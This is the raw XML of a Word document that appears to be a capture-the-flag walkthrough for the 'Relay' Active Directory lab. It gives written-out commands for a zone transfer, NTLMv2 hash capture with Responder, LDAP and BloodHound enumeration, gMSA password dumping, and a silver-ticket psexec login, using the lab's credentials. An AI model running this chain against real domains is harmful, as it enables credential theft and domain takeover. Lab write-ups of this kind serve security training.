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Relay ENG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xnga0r7xsz5f"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understand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3kt219dpq1e5"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111500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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itygdmhglly4" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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540000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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 line to the hosts file, as shown in the image.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6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Zone transfer from the primary server to one of the nameservers:</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dig axfr relay.uhclabs @relay.uhclabs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7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discover a new subdomain → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cert.relay.uhclabs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so we add it to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4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subdomain.</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6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it asks us to set the parameter → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">crt_file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, passing the path where the certificate is located.</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can start a Python server and verify whether any request reaches us.</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pj6lj4rdnfa" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>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590800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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nrm1rcjmh2q3" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>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311400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="7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w1sc2elqz73e" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Responder</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Responder is capable of many things, such as prompting users with fake dialogs to obtain plaintext passwords. In its default configuration, it will detect LLMNR and NBT-NS traffic. It responds on behalf of servers that the victim is looking for and captures their NTLMv2 hashes.</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These hashes must be brute-forced before they can be used. This contrasts with passwords extracted from the Windows registry for local accounts, where you can perform</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> pass-the-hash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks.</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978400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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way to obtain an NTLMv2 hash is to make the user visit our SMB share:</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\\&lt;IP-VPN&gt;\share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5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NTLMv2 hash in hand, we can use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to crack it.</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5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cl3b39spf7gc" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>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95cn4zc7iphd" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LDAPDomainDump</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an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Active Directory</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain, a lot of interesting information can be retrieved via LDAP by any authenticated user (or machine). This makes LDAP an interesting protocol for information gathering during the reconnaissance phase of an internal network pentest. One problem is that LDAP data is generally not available in an easy-to-read format.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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ldapdomaindump</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool designed to solve this problem by collecting and analyzing information available via LDAP and presenting it in a human-readable HTML format, as well as machine-readable JSON and CSV/TSV/greppable files.</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ldapdomaindump -u 'RELAY\op' -p '1qaz@WSX' -at SIMPLE ldap://&lt;IP&gt;</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browser to visualize the results more clearly =)</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6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file → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">domain_users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we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08100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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s3lr24gt4ynk" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound</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The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">BloodHound </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uses graph theory to reveal hidden and often unintended relationships in an Active Directory or Azure environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to identify quickly. Defenders use it to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to gain a deeper understanding of privilege relationships in an Active Directory or Azure environment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hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/fox-it/BloodHound.py</w:t>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https://bloodhound.readthedocs.io/en/latest/installation/linux.html</w:t>
        </w:r>
      </w:hyperlink>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run BloodHound in Python (installed via pip3) and extract domain data. It is worth mentioning that in this lab, the domain configuration connects the Domain Controller, clients, and our attacker machine essentially on the same network. To retrieve domain data, any domain user can be used.</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bloodhound-python -u op -p '1qaz@WSX' -ns &lt;IP&gt; -d relay.uhclabs</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console neo4j</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5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Then access the graphical interface and authenticate </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">localhost:7474</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33900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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BloodHound and load our dump files by dragging them into the interface =)</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v9e2sh6inibt" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>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opekguh0e4bm" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>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501900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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cs9yufrc55nx" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find Shortest Paths to Domain Admins</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means BloodHound will map Domain Admins and discovered users, allowing us to determine the best path to follow to reach Domain Administrator privileges with minimal resistance.</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35400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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that the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">svc_webapp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a member of the groups </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sdt>
        <w:sdtPr>
          <w:id w:val="-654368625"/>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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrators and Domain Admins. And we can read the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">gMSAPassword</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for this user =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">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ox5lkft0zosk" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Group Managed Service Accounts (gMSA)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">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Group Managed Service Accounts (gMSA) were introduced in Windows Server 2016 and can be leveraged on Windows Server 2012 and later. gMSAs provide a more secure way to run automated tasks, services, and applications. Why are they more secure? Because their passwords are fully managed by Windows. gMSA passwords are randomly generated, automatically rotated, and do not need to be known by any user. Service accounts are "installed" on the server that must query Active Directory for password information at runtime.</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hyperlink r:id="rId32">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/micahvandeusen/gMSADumper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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gMSADumper.py -u op -p "1qaz@WSX" -d relay.uhclabs</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6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cjuxmdjx8dx1" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Silver Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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Silver Ticket attack is based on creating a valid </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TGS for a service once the service NTLM hash is obtained (such as a computer account hash)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. This allows forging a custom TGS for any user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to access that service.</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case, we have obtained the NTLM hash of a computer account (which is a type of user account in AD). Therefore, we can create a ticket to log into that machine with administrator privileges via the SMB service.</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http://gettgt.py/</w:t>
        </w:r>
      </w:hyperlink>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Python script will request a TGT and save it as a ccache file for a password, hash, or AES key. We can inject it into the environment to access the requested service.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use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">getTGT</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to generate the ccache and use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">KERB5CCNAME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pass the ccache file to the requested service. This is a fully remote attack that does not require using a compromised local victim system.</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getTGT.py -hashes :HASH relay.uhclabs/svc_webapp</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KRB5CCNAME=/PATH/svc_webapp.ccache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psexec.py relay.uhclabs/svc_webapp@EC2AMAZ-HDQ6ICO.relay.uhclabs -k -no-pass</w:t>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6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read the final flag located on the Administrator’s Desktop =)</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5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9">
    <w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.175f5cs94z0o" w:id="18"/>
    <w:bookmarkEnd w:id="1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8" name="image26.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image2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Relay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0.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hyperlink" Target="https://github.com/fox-it/BloodHound.py" TargetMode="External"/><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hyperlink" Target="https://bloodhound.readthedocs.io/en/latest/installation/linux.html" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2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27.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/micahvandeusen/gMSADumper" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://gettgt.py/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><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WuoAx+p/xLtyU9YlyFzM2pVPw==">CgMxLjAaHQoBMBIYChYIB0ISEhBBcmlhbCBVbmljb2RlIE1TMg5oLm1kNXgyOXhscThkaTIOaC53MWhjejh4anJ2ZjUyDmguNmdqeXlmd3lpdTAyMg5oLmxlM2FsY2F4ZGY0bzIOaC54bmdhMHI3eHN6NWYyDmguM2t0MjE5ZHBxMWU1Mg5oLml0eWdkbWhnbGx5NDINaC5wajZsajRyZG5mYTIOaC5ucm0xcmNqbWgycTMyDmgudzFzYzJlbHF6NzNlMg5oLmNsM2IzOXNwZjdnYzIOaC45NWNuNHpjN2lwaGQyDmguczNscjI0Z3Q0eW5rMg5oLnY5ZTJzaDZpbmlidDIOaC5vcGVrZ3VoMGU0Ym0yDmguY3M5eXVmcmM1NW54Mg5oLm94NWxrZnQwem9zazIOaC5janV4bWRqeDhkeDEyDmguMTc1ZjVjczk0ejBvOAByITE2dFJoS1lyd0xyZFM3a0ZBU0IwRUswSUtJclBvamx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